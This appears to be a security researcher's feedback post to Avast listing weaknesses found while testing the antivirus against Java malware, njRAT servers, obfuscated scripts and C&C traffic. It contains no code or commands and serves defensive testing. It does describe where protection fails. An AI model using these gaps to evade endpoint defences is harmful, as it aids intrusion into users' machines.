Hi,
I am a malware hunter and I’ve been experimenting with Avast recently.
It offers great malware protection, but I’ve noticed several glitches and areas of improvement:
Java Malware:
Avast is one of the few vendors blocking Java malware effectively, but real-time protection doesn’t block *.jar files as soon as they are created. Unless you right-click-scan the item, malware gets blocked by IDP seconds after opening, even though there is a detection in definitions. This looks like a scanning glitch.
C&C Servers:
Avast hasn’t developed technology that blocks connection to known C&C servers. Web Shield blocks dangerous downloads and phishing, but all other connections are allowed. This may be a great area of improvement.
I’m sure you have a database of known C&C servers and it won’t be too hard for you to extract them from malware during analysis. It will boost your protection to unprecedented levels.
Correction:
There is an option for blocking known C&C servers is settings, but it doesn’t look very effective. I tried many RATs connecting mainly to domains *.hopto.org, some of them months old and they are still not blocked.
Ransomware Protection:
It would’ve been great to be able to select different modes for different folders, instead of just selecting one mode in general.
Extracting domains from malware and analysing relationships on VT might be a good idea.
Webcam Protection:
I was experimenting with NJRAT (downloading pre-built servers) and several times I had attackers connected. They could turn on my webcam, so I suggest you download some RATs and test/fix this.
Scripts, fileless malware:
This is a bit of a hit and miss (tends to be effective with minor exceptions). I suggest you have a look at tools, such as Invoke-Obfuscation Master as well as maldocs and develop generic methods to block downloaders and droppers, specially when they abuse common Windows processes (wscript, cscript and others) and are obfuscated.
Removal:
I noticed sometimes removed malware remains in memory (that happened with NJRAT servers again). I think the way you terminate processes should be improved.
Otherwise, due to the IDP I believe, you have great correlation and remove malware in their entirety, unlike many others. I tested your ability to remove scheduled tasks with malicious PowerShell code and you did great.
Firewall:
Firewall doesn’t seem to scan programs for viruses before allowing them to connect, as on my test it allowed threats for which it had a detection. It would be a good idea not to allow known malware to connect, as well as maybe a “hardened mode”, where all untrusted executables are blocked from connecting.
As a side note, I sent you some pretty interesting samples days ago and they are still undetected. I sent you a JPHP Coinminer and Python Stealer, which I discovered myself. At the time of sending, it had a very low detection (only Kaspersky, ZoneAlarm indirectly and one more). I was expecting you to take it more seriously, but there is no detection to date.
It could’ve made a great article.
GData analyst already published an article on the samples I discovered: https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp